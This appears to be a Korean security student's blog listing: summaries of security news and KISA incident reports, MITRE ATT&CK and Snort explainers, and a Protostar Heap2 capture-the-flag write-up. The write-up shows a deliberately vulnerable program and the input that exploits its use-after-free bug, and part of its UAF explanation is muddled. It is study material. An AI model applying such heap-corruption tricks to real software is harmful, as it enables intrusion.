[IT/보안뉴스] 구글, 곧 사용자들의 다크웹 스캔 허용한다

제나나 — Thu, 11 May 2023 23:56:38 +0900

기사요약 :

구글에서 미국 사용자들을 대상으로 다크웹에서 스캔된 개인정보를 제공하는 서비스를 시작한다고 하며 글로벌 사용자들에게도 제공할 계획을 가지고 있다고 한다.

- 이 서비스가 저공된다면 자신의 개인정보가 다크웹 상에서 유통되고 있는지 확인할 수 있으며

- 확인할수 있는 정보로는 자신의 지메일ID, 이름, 주소, 이메일주소, 전화번호, 사회보장번호라고 한다. 구글은 유출된 사용자들에게 자동으로 보고서 및 권장 조치사항을 전달할 예정이다.

문가용 기자, 구글, 곧 사용자들의 다크웹 스캔 허용한다, 보안뉴스, https://www.boannews.com/media/view.asp?idx=117993

구글, 곧 사용자들의 다크웹 스캔 허용한다

보안 외신 시큐리티위크에 의하면 구글이 미국 사용자들을 대상으로 새로운 서비스를 제공하기 시작했다고 한다. 다크웹을 스캔하여 자신의 지메일 ID, 이름, 주소, 이메일 주소, 전화번호, 사회

www.boannews.com

[KISA] TTPs#1 홈페이지를 통한 내부망 장악

제나나 — Wed, 10 May 2023 23:39:18 +0900

TTPs#1

홈페이지를 통한 내부망 장악

출처 : KISA 보호나라, https://www.boho.or.kr/kr/bbs/view.do?searchCnd=1&bbsId=B0000127&searchWrd=TTP&menuNo=205021&pageIndex=1&categoryCode=&nttId=35330

KISA 인터넷 보호나라&KrCERT

www.boho.or.kr

최근까지 공격을 받은 피해 시스템을 2개월에 걸쳐 분석하고 조치하였으며 수집한 정보를 종합하여 다음과 같이를 도출하였다

① 최초 침투(Initial Access)

공격자는 외부에 노출되어있는 사내 홈페이지를 통해 최초로 접근을 시도하였다. 이후 특정 계정으로 로그인을 단번에 성공한 것으로 보아 외부 노출 페이지와 , 계정정보를 기존에 미리 수집한 것으로 추정된다.

공격자는 게시판에 존재하는 파일 업로드 취약점을 이용하여 웹셸을 업로드하고 이를 통해 서버를 제어한다.

② 접근 권한 수집

- 웹셸로 접근하였기 때문에 웹 서비스 권한만 소유한 공격자는 추가적인 악성 행위를 위해 운영체제에 존재하는 취약점을 이용하여 권한 상승을 시도하였다 .

- 이후 추가적인 계정 정보를 수집하기 위해 키로깅 악성코드를 설치한다

③ 내부전파

- 권한 상승에 성공한 공격자는 이후 추가적인 전파를 위해 네트워크 공유를 이용한다. 이때 같은 계정을 사용하거나 세션이 유지되고 있는 서버에 대한 접근에 성공한다.

④ 악성코드 실행

- 이후 공격자는 at 명령어를 이용하여 악성코드를 스케줄러에 등록하여 실행하거나, sc 명령어를 이용하여 서비스로 등록하여 실행시킨다

⑤ 흔적 삭제

- 공격자는 공격을 마치거나 또는 거점으로서 일시적으로 이용한 서버에 대해서는 이벤트로그를 삭제하거나 악성코드를 삭제함으로서 공격의 흔적을 지운다.

⑥ 탈취 정보

- 공격자는 최종적으로 악성코드의 명령을 통하여 사내 정보를 수집하며 웹 페이지가 운영되는 서버에서는 웹로그도 수집한다.

TTPs#1 홈페이지를 통한 내부망 장악.pdf

3.47MB

KrCERT Operation BookCode Yara Rule (1).yar

0.00MB

[보안용어] MITRE ATT&CK(Adversarial Tactics, Techniques and Common Knowledge)

제나나 — Sun, 7 May 2023 23:47:40 +0900

[보안용어] MITRE ATT&CK

(Adversarial Tactics, Techniques and Common Knowledge)

개요

우선, MITRE ATT&CK는 조직에서 보안 태세를 파악하고 방어 취약점을 발견하도록 하기 위해서 MITRE라는 기업에서 개발한 프레임워크와 일련의 데이터 매트릭스, 평가 툴

* MITRE : 미국 연방정부의 지원을 받아 국가안보관련 업무를 수행하던 비영리 연구개발 단체

ATT&CK Framework를 이해하기 위해서는 Cyber Kill Chain이라는 용어를 이해해야한다.

Cyber Kill Chain

Cyber Kill Chain(사이버 킬 체인)은 군사용어인 Kill Chain(킬체인)이란 타격순환체계에서 비롯되었는데, 발사된 미사일을 요격하는 것이 아니라 선제적으로 미사일 발사 자체를 저지하겠다는 개념으로 사이버공간에 적용한 것이 바로 Cyber Kill Chain(사이버 킬 체인)이다.

즉, 사이버 공격이 5단계를 거쳐서 진행되는데 각 단계별 위협요소를 제거하기 위한 활동으로 공격자 입장에서 공격 분성르 통해 단계별 연결고리(Chain)을 사전에 끊어 피해를 최소화 하는 것이 전략의 목표이다.

사이버 보안에서 '킬체인'이라는 용어를 처음 사용한 것은 미국 군수업체인 록히드마틴 (Lockheed Martin Corporation)이다.

- 단계별 사이버 킬 체인 예시

1단계	정찰(Reconnaissance)	공격대상 인프라에 침투해 거점을 확보하고 오랫동안 정찰 수행
2단계	무기화 및 전달 (Weponization and Delivery)	공격 목표를 달성하기 위해 정보를 수집하고 권한을 획득
3단계	익스플로잇/설치 (Exploit and Installation)	공격용 악성코드를 만들어 설치
4단계	명령/제어 (Command and Control, C&C)	원격에서 명령 실행
5단계	행동 및 탈출 (Action and Exfiltration)	정보유출 혹은 시스템 파괴 후 공격자는 증거 삭제

MITRE ATT&CK

마이터 어택은 공격자들의 최신 공격 기술 정보가 담긴 저장소

MITRE ATT&CK은 Adversarial Tatics, Techniques and Common Konwledge의 약자

Adversary behaviors : 악위적행위

Tatics : 공격방법

Techniques : 기술

즉, 악의적인 행위에 대해서 공격방식과 기술에 대한 정보를 분류해 목록해 놓은 것

ATT&CK는 MITRE에서 윈도우 기업 네트워크 환경에 사용되는 해킹 공격에 대해서 방법(Tatics), 기술(Techniques), 절차(Procedures) 등 TTPs를 문서화 하는 것부터 시작되었음. 이후 공격 행동 패턴 분석을 기반으로 TTPs 정보를 매핑하여 공격자 행위를 식별할 수 있는 프레임워크로 발전.

MITRE ATT&CK 홈페이지에 있는 화면

- ATT&CK Matrix 예시

- Reconnaissance : 정찰

- Resource Development : 자원개발

- Initial Access : 최초 침투
- Execution : 실행
- Persistence : 지속성 유지
- Privilege Escalation : 권한 상승
- Defense Evasion : 방어 회피
- Credential Access : 계정정보 접근
- Discovery : 탐색
- Collection : 정보 수집
- Lateral Movement : 시스템 내부 이동
- Command and Control : 명령제어
- Exfiltration : 정보 유출

- Impact : 시스템 충격

MITRE ATT&CK의 이점

1. 조직에서 공격자의 운영 방식을 이해

2. 공격자가 초기 액세스 권한을 확보하고, 데이터를 검색하며, 수평으로 이동하고, 데이터를 유출하기 위해 취하는 단계 파악 가능

공격자의 관점에서 볼 수 있어 동기와 전력이해가 쉬움

3. 보안 태세의 격차를 식별하고 공격자의 다음 행동을 예측하여 신속하게 교정하도록 지원하여 위협 탐지와 대응 개선이 가능

✔ Refrence

이글루시큐리티, MITRE ATT&CK Framework 이해하기, https://www.igloo.co.kr/security-information/mitre-attck-framework-%EC%9D%B4%ED%95%B4%ED%95%98%EA%B8%B0/

MITRE ATT&CK Framework 이해하기

01. 개요 지금도 사이버 공간을 위협하려는 공격 시도는 계속되고 있다. 디도스, 랜섬웨어 등 사이버 공격은 갈수록 지능화·고도화 되어가고 있으며 따라서 여전히 많은 이들이 지속적 위협

www.igloo.co.kr

VMWARE, MITRE ATT&CK이란?, https://www.vmware.com/kr/topics/glossary/content/mitre-attack.html#:~:text=ATT%26CK%20%EB%A7%A4%ED%8A%B8%EB%A6%AD%EC%8A%A4%EB%8A%94%20%EA%B3%B5%EA%B2%A9%EC%9E%90%20%EB%98%90%EB%8A%94,%EC%A0%84%EB%AC%B8%EA%B0%80%EC%97%90%20%EC%9D%98%ED%95%B4%20%ED%99%9C%EC%9A%A9%EB%90%A9%EB%8B%88%EB%8B%A4.

What Is MITRE ATT CK - Definition | VMware Glossary

MITRE ATT CK is a framework, set of data matrices, and assessment tool developed by MITRE Corporation to help organizations understand their security readiness.

www.vmware.com

MITRE 홈페이지, https://attack.mitre.org/

MITRE ATT&CK®

MITRE ATT&CK® is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. The ATT&CK knowledge base is used as a foundation for the development of specific threat models and methodologies in the private se

attack.mitre.org

[Protostar] Heap2

제나나 — Thu, 4 May 2023 23:51:56 +0900

[Protostar] Heap2

About

This level examines what can happen when heap pointers are stale.

This level is completed when you see the “you have logged in already!” message

This level is at /opt/protostar/bin/heap2

이 레벨은 힙 포인터가 오래되었을 때 발생할 수 있는 일을 조사하는 것으로 "you have logged in already!”"라는 메시지가 표시되면 이 레벨이 완료된 것입니다.

#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <stdio.h>

struct auth {
  char name[32];
  int auth;
};

struct auth *auth;
char *service;

int main(int argc, char **argv)
{
  char line[128];

  while(1) {
      printf("[ auth = %p, service = %p ]\n", auth, service);

      if(fgets(line, sizeof(line), stdin) == NULL) break;
      
      if(strncmp(line, "auth ", 5) == 0) {
          auth = malloc(sizeof(auth));
          memset(auth, 0, sizeof(auth));
          if(strlen(line + 5) < 31) {
              strcpy(auth->name, line + 5);
          }
      }
      if(strncmp(line, "reset", 5) == 0) {
          free(auth);
      }
      if(strncmp(line, "service", 6) == 0) {
          service = strdup(line + 7);
      }
      if(strncmp(line, "login", 5) == 0) {
          if(auth->auth) {
              printf("you have logged in already!\n");
          } else {
              printf("please enter your password\n");
          }
      }
  }
}

auth라는 구조체는 32bytes의 name과 4bytes의 auth로 구성되어 있다.

main함수가 시작되면서 while문을 돌면서 fgets을 통해서 사용자로 부터 입력을 받는다.

비교하는 곳이 4군데 있는데

1) strncmp(line, "auth ",5)==0 이부분에서

'auth 입력값'을 사용자가 입력하면, auth = malloc(sizeof(auth));를 통해서 구조체 auth의 크기 만큼 메모리가 할당되고 입력한 값은 auth->name에 저장된다.

2) strncmp(line, "reset",5)==0

'reset'을 입력하게 되면, 기존에 할당된 auth의 메모리가 해제됨.

3) strncmp(line, "service",6)==0

strdup함수를 이용해서 문자열이 복제되고 service포인터는 복제된 문자열을 가리키게 됨.

4) strncmp(line, "login",5)==0

login을 입력하면, auth구조체의 auth필드 값을 확인하여 auth->auth의 값이 변조 되었으면 성공, 아니면 실패한다.

User After Free 기법을 이용한 공격이다.

UAF에 대해서 공부를 하자면,

UAF(Uninitialized Use After Free) 기법은 동적 메모리 할당과 관련된 보안 취약점 중 하나로, 이미 해제된 메모리를 계속 사용하게 되어 발생하는 취약점이다.

일반적으로 동적 메모리 할당 함수(malloc, calloc, realloc 등)를 사용하여 메모리를 할당하면, 해당 메모리의 주소를 반환받는다. 이후 할당된 메모리를 사용하고자 할 때에는 해당 메모리 주소를 이용하여 접근하게 된다.

그러나 이렇게 사용된 메모리를 해제해 주지 않으면, 이미 해제된 메모리를 사용하게 되면서 UAF 취약점이 발생

UAF 취약점은 일반적으로 다음과 같은 상황에서 발생 :

1) 메모리 할당 후 해당 메모리를 해제하지 않은 경우

2) 이미 해제된 메모리를 계속 사용하는 경우

예를 들어, 다음과 같은 코드가 있다고 가정

#include <stdlib.h> 
#include <stdio.h> 
int main() { 
  int *p = malloc(sizeof(int)); 
  *p = 10; 
  free(p); 
  printf("%d\n", *p); 
  return 0; 
}

1. 위 코드에서는 먼저 malloc 함수를 이용하여

int 자료형 크기만큼의 메모리를 할당

이후 해당 메모리에 10을 저장

2. 그러나 이후 free 함수를 이용하여 p가 가리키는 메모리를 해제합니다.

3. 그리고 나서 p가 가리키는 메모리에 접근하여 그 값을 출력하려고 합니다.

이때 이미 해제된 메모리를 접근하게 되므로 UAF 취약점이 발생합니다.

UAF 예방 방법 :

1) 메모리를 해제한 후에는 해당 메모리를 더 이상 사용하지 않도록 NULL 값을 할당

2) 포인터를 이용하여 메모리에 접근하기 전에는 해당 포인터가 NULL인지 확인

문제를 풀기위해서는 login을 입력하였을 때, auth->auth에 값이 있어서 "you have logged in already!"라는 문자가 나와야 한다.

auth를 malloc으로 메모리를 할당하고, free로 메모리 해제를 한다.

auth 포인터가 가리키는 구조체 auth 필드는 해제되기 이전의 값을 계속 가지고 있음.

strdup 함수는 인자로 전달된 문자열을 동적으로 할당(malloc)하고, 그 문자열을 복사하여 반환하는 함수이다.

strdup으로 service를 할당하게 되면다면, 아마 기존에 해제되었던 부분에 접근 가능해진다.

여기서 auth와 service의 주소를 보면 0x10(10진수로 16bytes)가 차이 난다.

즉 기존의 auth의 name 32bytes에서 포인터 시작부분에서 16bytes 떨어진 곳에 service가 시작된다.

그래서 service 값으로 17bytes를 넣어주면 기존에 auth의 auth부분이 덮어써지게 된다.

그래서 다시 service의 입력값으로 B 16개(16bytes) + 엔터 1byte로 17bytes을 주면, 성공한다!

[IT/보안뉴스] 미국 CISA, “미라이 봇넷이 패치 안 된 TP링크 라우터들 노린다” 경고

제나나 — Wed, 3 May 2023 23:09:05 +0900

기사 요약 :

CISA에서 TP-Link 라우터를 취약점을 타겟으로 하는 미라이(Mirai) 봇넷 취약점을 3개 더 추가하면서 공격에 유의를 주의했으며 해당 공격에 대한 패치가 배포되고 있어 빠른 조치가 필요해 보인다.

[ 미라이 봇넷 ]
Mirai 악성코드는 감염된 Linux 기반 사물 인터넷(IoT) 장치를 원격으로 제어할 수 있는 봇넷으로 롤업하여 분산 서비스 거부(DDoS) 공격을 포함한 대규모 네트워크 공격을 수행

[ 3개 취약점 ]
1) CVE-2023-1389 (TP-Link Archer AX-21 Command Injection Vulnerability)
- CVE-2023-1389로 추정되는 TP-Link의 Archer AX21 Wi-Fi 6 라우터의 명령 주입 결함은 문제를 해결하는 버전 1.1.4 빌드 20230219 이전의 장치 펌웨어에 숨어 있음.
- 권한이 없는 공격자는 이 취약점을 악용하여 RCE(원격 코드 실행)로 이어질 수 있는 명령을 주입하여 침입자가 네트워크 또는 인터넷을 통해 장치를 제어

2) CVE-2023-21839 (Oracle WebLogic Server Unspecified Vulnerability)
오라클 웹로직 서버 지정되지  않은 취약점

3) CVE-2021-45046 (Apache Log4j2 Deserialization of Untrusted Data Vulnerability)
  > Log4j 취약점과 Log4Shell 취약점과 관련됨

문가용 기자, 미국 CISA, “미라이 봇넷이 패치 안 된 TP링크 라우터들 노린다” 경고, 보안뉴스, https://m.boannews.com/html/detail.html?tab_type=1&idx=117755

미국 CISA, “미라이 봇넷이 패치 안 된 TP링크 라우터들 노린다” 경고

IT 외신 레지스터에 의하면 미라이(Mirai)라는 악명 높은 봇넷이 패치되지 않은 TP링크(TP-Link) 라우터들을 공략하는 중이라고 한다. 미국 CISA는 특히 유의해야 할 취약점 세 개를 시급한 패치가 필

m.boannews.com

Jeff Burt, Mirai botnet loves exploiting your unpatched TP-Link routers, CISA warns, The Register, https://www.theregister.com/2023/05/02/cisa_exploited_flaws_oracle_apache/

CISA warns of Mirai botnet exploiting TP-Link routers

Oracle and Apache holes also on Uncle Sam's list of big bad abused bugs

www.theregister.com

[IT/보안뉴스] '비행기 탑승모드' 아직 필요한 이유는?

제나나 — Sun, 30 Apr 2023 22:22:46 +0900

기사 요약 :

비행기 탑승 때 무선통신 기능이 꺼진 상태 즉 비행기 모드로 휴대전화 전자기기를 사용하라고 하는데 그 이유는 이론적으로 항공기의 통신과 운항 시스템과 동일한 주파수 대역 내에서 신호를 방출해 전자기 간섭이 발생할 수 있기 때문이다. 이에 대해 1992년 연구에서는 이륙과 착륙을 제외한 단계에서는 큰 문제가 발생하지 않는 결과가 나왔지만, 최근의 5G 통신 기술은 아직까지 제대로 연구되지 않은 부분이 많아 위험성이 있으므로 사용 시 주의를 할 필요가 있다고 한다.

- 5G 통신을 비행기에서 사용하면 안되는 이유 :

비행기와 같은 제한된 5G 무선 네트워크 대역폭 범위에 많은 전자기기가 접속하게되면, 항공 운항에 필수적인 장치인 '전자고도계(Radio Altimeter)'가 사용하는 대역폭을 잠식할 가능성이 있기 때문이다. 이로 인해 착륙을 지원하는 공항 인근 내비게이션 시스템에 간섭이 발생할 수 있기 때문에 항공기에서는 '비행기 모드'를 사용해 전자기기를 이용한게 안전하다고 한다.

류수연 기자, '비행기 탑승모드' 아직 필요한 이유는?, 농민신문, https://n.news.naver.com/mnews/article/662/0000017779?sid=105%EF%BB%BF

‘비행기 탑승모드’ 아직 필요한 이유는?

비행기에 탑승하면 “무선통신 기능이 꺼진 상태에서 휴대전화 등 전자기기를 사용하라"는 주의사항을 듣게 된다. 운항시 전파방해가 우려된다는 이유에서다. 특히 5G폰을 가진 경우라면 더욱

n.news.naver.com

[IT/보안뉴스] 중국 해킹그룹 샤오치잉, 국내 기업 또 다시 해킹 공격

제나나 — Fri, 28 Apr 2023 01:13:37 +0900

기사 요약 :

중국 해킹그룹 샤오치잉이 1월 한국을 대상으로 해킹 선포를 한 후 해킹 공격 이후 2월 19일 해킹을 그만둔다고 선언한 후 4월 22일 다시 한국 기업인 한국인프라 웹사이트를 공격하기 시작하면서 한국 기업과 기관들의 준비가 필요해 보인다.
기존 샤오치잉의 해킹 수법은 이미 알려진 취약점(WAS 취약점) 및 해킹 툴(Sqlmap, Nuclei)을 이용하고 고전적인 공격 기법을 사용하기 때문에 기본 보안을 강화하면 침해사고에 대비할 수 있다고 KISA 관계자가 전했다고 한다.

박은주 기자, [단독] 중국 해킹그룹 샤오치잉, 국내 기업 또 다시 해킹 공격, 보안뉴스, https://www.boannews.com/media/view.asp?idx=117388&page=1&kind=1

[단독] 중국 해킹그룹 샤오치잉, 국내 기업 또 다시 해킹 공격

중국의 해킹그룹 ‘샤오치잉(晓骑营)’이 한국의 인프라 구축 전문업체 ‘한국인프라’를 해킹한 것으로 드러났다. 한국인프라 웹페이지를 공격해 화면을 변조하는 디페이스 공격을 하고 일부

www.boannews.com

[KISA] 샤오치잉(晓骑营) 공격 그룹 침해사고 및 대응방안 보고서

제나나 — Thu, 27 Apr 2023 22:52:44 +0900

샤오치잉(晓骑营) 공격 그룹 침해사고 및 대응방안 보고서

- 한국인터넷진흥원(KISA) 보고서

출처 : KISA 인터넷보호나라, https://www.boho.or.kr/kr/bbs/view.do?searchCnd=&bbsId=B0000127&searchWrd=&menuNo=205021&pageIndex=1&categoryCode=&nttId=71066

KISA 인터넷 보호나라&KrCERT

www.boho.or.kr

1. 개요

- 올해 1월 샤오치잉 해커조직이 대한민국을 겨냥하는 메시지와 함께 해킹 예고를 했는데, 침해사고 공격 기법에 대한 소개와 대응 방안에 대한 안내

2. 타임라인

2023년 1월 7일	A社 내부자료를 샤오치잉 Github Pages에 공개(개인정보 160여명)
2023년 1월 20일	B社 홈페이지 웹페이지 변조 후 샤오치잉 텔레그램 채널에 공개(개인정보 70여명)
2023년 1월 21일	B社 내부정보를 샤오치잉 홈페이지에 공개 C社 서버의 내부 정보(디렉터리 및 파일 목록) 일부를 샤오치잉 텔레그램 채널에 공개
2023년 1월 22일	KISA 보안공지: 국내 홈페이지 변조 관련 민간부문 보안 강화 권고 안내
2023년 1월 24일	샤오치잉 텔레그램 채널에 한국인터넷진흥원 공격 예고
2023년 1월 24일 ~ 26일	C社 서버에서 DB 삭제, 웹페이지 변조 후 확보한 DB Dump 파일을 샤오치잉 텔레그램 채널 에 공개
2023년 2월 14일	WebLogic 취약점을 악용해서 D社, E社, F社 홈페이지 침투 후 웹페이지 변조
2023년 2월 18일	A社 내부자료를 추가 확보 후 샤오치잉 홈페이지에 공개(개인정보 22,000여명)

3. 공격기법

1) 취약점 스캔 - sqlmap, Nuclei 사용

2) 취약한 웹 서비스를 통한 내부 침투 - SQL Injection, 계정 설정 파일 접근, 오래된 버전의 WebLogic 악용

3) 피해 발생 - 내부정보 탈취, 웹사이트 변조 및 무단생성

4) 해킹 사실 공개

4. 대응 방안

1) SQL Injection 공격 예방 - 웹 서버 시큐어 코딩, 웹 방화벽 설치

2) 계정정보 관리 - 서버 내 계정정보 업로드 여부 점검

3) 운영체제 및 소프트웨어 버전 업그레이드

4) 중요자료 백업

5) 로그 설정 - 웹 로그 주기적 점검 및 백업, WebLogic 로그 저장 연장

6) 한국인터넷진흥원 정보보호 서비스 활용

5. 결론

>> 신고접수 된 피해기업 대부분이 보안 투자를 많이 하기 어려운 소규모 기업 또는 기관

>> 고전적인 기법(SQL Injection, 알려진 취약점 악용)을 사용

Appendix - 악성파일(웹셸) MD5 Hash, 공격자 IP

* 보고서 링크 : https://kisa-irteam.notion.site/09d3e4c83a784380acc3b36271a1f58a

샤오치잉(晓骑营) 공격 그룹 침해사고 및 대응방안 보고서

1. 개요

kisa-irteam.notion.site

파일 :

샤오치잉(晓骑营)_공격_그룹_침해사고_및_대응방안_보고서.pdf

4.58MB

[IT/보안뉴스] 과기정통부가 바라보는 스타링크 한국 상륙 '초읽기'

제나나 — Tue, 25 Apr 2023 23:58:46 +0900

기사 요약 :

올해 상반기 일론 머스크의 스타링크라는 스페이스X가 운영하는 위성 인터넷 사업이 국내에 출시를 앞두고 있는 가운데 과학기술정보통신부에서는 B2C보다는 선박, 항공과 같은 특수목적에 이용되어 경쟁력을 제한적으로 보고 있다고 했다.

* B2C : 기업소비자간 거래, B2B : 기업간거래

- 스타링크 : 2020년 서비스를 시작했으며, 현재는 4000여개의 위성을 기반으로 전세계 50여 개국의 인터넷을 제공하고 있음. 2030년에 4만개 이상의 위성을 배치한다는 목표가 있음.
기존의 위성 통신망과 수중 광케이블의 단점을 개선하고 유선 인터넷과 무선 통신망의 한계를 극복한 위상 기반의 인터넷 사업.

김수민 기자, 과기정통부가 바라보는 스타링크 한국 상륙 '초읽기', 블로터, https://n.news.naver.com/article/293/0000043610?sid=105

과기정통부가 바라보는 스타링크 한국 상륙 '초읽기'

일론 머스크의 스타링크가 국내 시장 진출을 앞둔 가운데, 정부가 아직은 경쟁력이 제한적이라는 입장을 내비쳤다. 박윤규 과학기술정보통신부(이하 과기정통부) 제2차관은 최근 광화문 국가과

n.news.naver.com

[IT/보안뉴스] 구글 클라우드에서 발견된 유령, 영원히 ‘삭제 중’ 상태 유지하며 사라졌다 나타났다

제나나 — Mon, 24 Apr 2023 16:23:24 +0900

기사 요약 :

구글 클라우드 플랫폼(GCP)에서 발견된 고스트토큰(GhostToken)이라는 취약점은 서드파티앱의 토큰을 악용하여 악성 애플리케이션을 피해자의 구글 계정에 심을 수 있으며 해당 애플리케이션은 완전 삭제되지 않고 피해자가 보이지 않게 '삭제 중'으로 남아있어 추후에 다시 악용이 가능하고 발견이 쉽지 않다고 한다.

[ 공격 원리 ]
- GCP라는 공간에 앱 스토어가 존재하는데 그중에서 비공식 서드파티 앱 스토어들을 이용할 경우 앱을 다운로드하면 토큰(Token)이 부여되고 해당 토큰을 이용해 사용자의 구글 계정에 접근 가능
- 고스트토큰 취약점을 이용하여 앱을 앱 스토어에 심어 넣을 경우 멀웨어가 구글 계정에 접근할 수 있는데 관리 페이지에는 공격자의 앱이 표시되지 않도록 해 탐지되기 어렵게 한다. 일종의 보이지 않는 앱(Ghost APP)

[ 공격 시나리오 ]
1) 피해자가 OAuth 기반 애플리케이션을 승인하도록 속여 피해자의 구글 계정 토근이 공격자에게 전달.
2) 인증된 OAuth 기반 애플리케이션과 관련 프로젝트를 삭제. 그러면 '삭제 중' 상태가 됨. (삭제가 된 것도 아니고 안된 것도 아닌 상태이기 때문에 사용자의 앱목록에 나타나지 않음)
3) 해당 애플리케이션을 복구하면 새로운 토큰이 생성되고, 사용자의 정보에 접근
4) 정보 접근 이후 다시 프로젝트를 삭제하면 애플리케이션이 '삭제 중' 상태가 됨. 유령상태

[ 구글의 조치 ]
- '삭제 중' 상태가 지속 중이어도 해당 앱이 목록에 나타나도록 패치

문가용 기자, 구글 클라우드에서 발견된 유령, 영원히 ‘삭제 중’ 상태 유지하며 사라졌다 나타났다., 보안뉴스, https://www.boannews.com/media/view.asp?idx=117371

구글 클라우드에서 발견된 유령, 영원히 ‘삭제 중’ 상태 유지하며 사라졌다 나타났다

구글 클라우드 플랫폼(GCP)에서 보안 취약점이 하나 발견됐다. 이 취약점을 익스플로잇 할 경우 공격자들은 악성 애플리케이션을 피해자의 구글 계정에 심을 수 있게 된다. 이러한 악성 애플리케

www.boannews.com

[IT/보안뉴스] 엘포인트, 롯데시네마, 곰 등 감염시킨 골도슨 멀웨어, 1억 회 다운로드 돼

제나나 — Fri, 21 Apr 2023 21:26:56 +0900

기사 요약 :

맥아피가 발견한 골도슨(Godoson)이라는 데이터 탈취와 클릭 사기 기능의 멀웨어가 서드파티 라이브러리를 통해서 60개 이상의 모바일 앱을 감염시켰으며 구글 플레이 스토어에서 1억 회 이상, 원스토어에서 800만 회 이상 다운로드되었다. 한국에서 사용되는 L.Point, L.Pay, 등이 포함되어 있어서 앱 사용자들은 빠른 업데이트다 필요해 보인다.

- 감염된 앱 :
1) L.POINT
2) L.PAY
3) Swipe Brick Breaker
4) Money Manager Expense & Budget
5) Lotte Cinema
6) Live Score
7) GOM

- 골도슨의 작동 방식 :
골도슨 라이브러리는 장비를 감염.
곧바로 공격자들의 C&C 서버에 등록.
원격에 저장된 설정 파일들을 다운.
화면에서는 앱이 정상적으로 실행.
라이브러리 이름과 원격 서버 도메인을 매번 바꾸기 때문에 잘 탐지되지 않음.

문가용 기자, 엘포인트, 롯데시네마, 곰 등 감염시킨 골도슨 멀웨어, 1억 회 다운로드 돼, 보안뉴스, http://www.boannews.com/media/view.asp?idx=117273

엘포인트, 롯데시네마, 곰 등 감염시킨 골도슨 멀웨어, 1억 회 다운로드 돼

데이터 탈취와 클릭 사기 기능을 가진 멀웨어가 서드파티 라이브러리를 통해 60개가 넘는 모바일 앱을 감염시키는 데 성공했다. 이 앱들은 구글 플레이 스토어를 통해 1억 회 이상 다운로드 됐다

www.boannews.com

[네트워크 보안 기술] Snort

제나나 — Fri, 21 Apr 2023 11:54:42 +0900

Snort

Snort는 프로토콜 분석, 콘텐츠 검색, 웜, 취약점 공격, 포트 스캔, 버퍼 오버플로우 등 다양한 공격을 탐지하는 OpenSource IDS

Snort의 구조

Snort는 네 가지 요소로 구성이 되어 있다.
Sniffer → Preprocessor → Detection Engine → Alert/Logging

1. Sniffer
네트워크를 도청하는데 쓰이는 하드웨어 또는 소프트웨어 장치 애플리케이션 또는 하드웨어 장치에서 해당 네트워크의 트래픽을 도청할 수 있다.

[ 용도 ]
- 네트워크 분석과 문제를 해결.
- 성능 분석과 벤치마킹 평문 비밀번호가 기타 데이터를 도청

2. Preprocessor
패킷 Sniffer로부터 전달받은 패킷을 특정한 플러그인으로 전달하여 패킷에서 특정한 종류의 행위를 찾는다. 패킷에서 특정한 행위를 찾은 뒤에 Detection Engine으로 전송하게 된다.

3. Detection Engine
Preprocessor로부터 패킷을 전달받아 패킷과 일치하는 Ruleset이 있다면 해당 패킷은 Alert/ Logging으로 전달된다.

4. Alert / Logging
Detection Engine과 일치하는 패킷이 있다면 경고가 발생하는데, 이때 경고는 로그 파일, SMB, SNMP 트랩 등으로 전달된다. Syslog와 같은 툴을 사용하면 E-mail을 통해 관리자에게 실시간으로 전달.

Snort Rule

snort rule / signature는 크게 헤더와 옵션 부분으로 구성

Rule Header - 처리 방식, 프로토콜, IP 주소, 포트 번호 등 처리할 패킷을 판단하는 기준 명시

Rule Option - 패킷을 탐지하기 위한 규칙을 명시

1. Rule Header(룰 헤더)

1. rule actions - 8가지
1) alert : 선택한 경고 방법에 따른 alert 발생 + 로그 기록
2) log : 로그를 저장
3) pass : 패킷을 무시
4) activate : alert 발생 + dynamic rule 활성화
5) dynamic : activate rule에 의해 활성화 + log rule과 동일하게 동작
6) drop : 패킷 차단 + 로그
7) reject : drop rule과 동일하게 패킷을 차단 + 로그, TCP인 경우 TCP Reset 전송, UPD인 경우 ICMP Port unreachable 메시지 전송
8) sdrop : 패킷 차단 but 로그 남기지 않음

2. protocols : 탐지할 프로토콜 4가지 TCP, UDP, ICMP, IP

3. IP Address
1) 모든 주소 : any
2) 단일 주소 : 192.168.0.1
3) 복수 주소 : [192.168.0.1 192.168.0.2] 또는 [192.168.0.0/24]
4) 부정 : !192.168.0.1 !192.168.0.0/24
5) 내부IP 주소 : $HOME_NET, 외부IP 주소 : $EXTERNAL_NET

4. Port Numbers
1) 모든 주소 : any
2) 단일 포트 : 80
3) 여러개 포트 : 1:500 (1~500까지)
4) 부정 : !80

5. Direction Operator : 방향 지시지
1) -> 단방향: 출발지 -> 목적지
2) <> 양방향
3) <- 방향지시자는 없음

헤더 사용예

action	protocol	ip address	port	direction	ip address	port
alert	TCP	any	any	->	192.168.133.0/24	80

action	protocol	ip address	port	direction	ip address	port
log	TCP	$EXTERNAL_NET	any	<>	$HOME_NET	80

2. Rule Option(룰 옵션)

룰옵션은 General, Payload, Non-payload, post-payload 로 주요 4개로 분류되고 주로 Payload 탐지 룰이 사용

- 일반 옵션
1. msg : alert, log에서 저장될 메시지명 지정
2. reference : 공격 참조 정보를 제공
3. sid : 스노트 규칙을 유일하게 식별하는 식별자
- 100미만은 예약
- 100~100만은 스노트 지정 룰
- 100만 초과는 사용자 정의 룰
4. rev : 스노트 규칙의 버전. 수정 횟수
5. classtype : 공격 종류와 규칙을 분류
6. priority : 분류(classtype) 옵션에 의해 설정된 규칙 우선순위를 강제로 수정
7. metadata : Rule 작성자가 추가정보를 Key-Value 형식으로 포함

- 페이로드
1. content : 탐지할 패턴(문자열)을 설정하는 옵션. text이거나 binary 형태(헥사값) 일수 있음.
2. nocase : 패턴 매칭 시 대소문자 구별하지 않고 매칭
3. offset : 해당 옵션에서 지정한 바이트만큼 떨어진 위치부터 탐색 시작
4. depth : 패킷 데이터에서 찾을 내용의 범위를 지정하는 옵션
5. distance : 이전 content 설정값 매칭 탐색할 위치를 지정 (시작점 + 바이트 수 다음부터 해당 문자 검사)
6. within : 이전 content 설정값 매칭 후 매칭을 끝낼 상대 위치를 지정 ( 시작점부터 바이트 수 이내 범위에서 해당 문자 검사)
7. pcre : 스노트 규칙에서 사용할 수 있는 perl 호환 정규 표현식. '/'는 시작과 끝에 표기, 16진수 앞에는 \x
8. flags : TCP 프로토콜에서 제어플레그를 지정하는 것으로 SYN, FIN, URG, ACK을 지정할 수 있다.
